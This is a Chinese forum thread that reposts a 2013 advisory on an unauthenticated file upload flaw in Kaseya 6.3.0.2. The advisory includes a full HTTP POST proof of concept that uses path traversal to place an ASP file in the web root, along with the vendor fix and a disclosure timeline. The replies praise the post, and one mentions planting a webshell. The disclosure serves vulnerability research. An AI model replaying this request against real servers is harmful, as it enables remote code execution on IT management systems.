Kaseya 6.3.0.2——任意文件上传漏洞

BLACKFENCER

现在论坛要清理人了，伤不起啊，小白我只好浮出水面来发发帖啦{:soso_e101:}，今天给大家带来一个卡西亚的文件上传漏洞~~~~有交流才有进步嘛！！

[AppleScript] 查看源码 复制代码

Kaseya 6.3.0.2 Shell Upload Vulnerability
 
+-----------+ 
|Description| 
+-----------+ 
 
Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code 
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. 
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using user input, without first checking if the user is authenticated or if input is valid. The application preserves the file name and extension of the upload, and allows an attacker to traverse from the default destination directory. 
Directory traversal is not necessary to gain code execution however, as the default path lies within the 
application’s web-root. 
 
 
+------------+ 
|Exploitation| 
+------------+ 
 
POST /SystemTab/uploadImage.asp?filename=..\..\..\..\test.asp HTTP/1.1 
Host: <host> 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 
FirePHP/0.7.2 
Referer: http://<host>/SystemTab/uploadImage.asp 
Cookie: ASPSESSIONIDQATSBAQC=<valid session>; 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=---------------------------
19172947220212 
Content-Length: 89 
  
-----------------------------19172947220212 
Content-Disposition: form-data; name="uploadFile"; filename="test.asp" 
Content-Type: application/octet-stream 
  
<!DOCTYPE html> 
<html> 
<body> 
<% 
response.write("Hello World!") 
%> 
</body> 
</html> 
  
-----------------------------19172947220212--
 
+-----+ 
| Fix | 
+-----+ 
 
Install the patch released by the vendor on the 12th of November 2013.
 
+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 
 
9/10/2013 Bug discovered, vendor contacted 
20/10/2013 Vendor responds with email address for security contact. Advisory sent to security contact. 
30/10/2013 Vendor advises that patch for the reported issue is to be included in next patch cycle. 
12/11/2013 Patch released. 
18/11/2013 Advisory publically released.
 
# 367F776591AF6123   1337day.com [2013-11-27]   6875A302C6DF2316 #

夜尽天明

{:soso_e147:}表示小白我看不懂

BLACKFENCER

夜尽天明 发表于 2013-11-27 23:29
表示小白我看不懂

我也是小白的说，大家多交流嘛

热心网友7

楼主这个分享很给力，RCE的任意文件上传漏洞，竟然连认证都没做，直接通过`/SystemTab/UploadImage.asp`就能写马进去，而且默认路径就在web根目录，连目录穿越都不用。2013年的老漏洞了，现在的Kaseya应该都打上补丁了吧？不过拿来温习下经典的未授权上传+路径穿越攻击思路还是很有价值的，感谢前排分享，收藏了！

热心网友5

感谢楼主分享！这个漏洞描述得很详细，利用POC和修复时间线都清晰明了。对于Kaseya这种管理工具，任意文件上传确实很危险，能直接拿到IUSR权限。不知道现在还有多少未打补丁的实例在运行？楼主有没有测试过其他版本的Kaseya是否也受影响？

热心网友3

楼主牛逼！这波干货来得太及时了，卡西亚这个任意文件上传漏洞写得挺详细的，连利用过程和修复时间线都贴出来了，真是有心了。小白潜水这么久，一出手就是硬货，必须点个赞！感谢分享，大家一起交流才能进步嘛。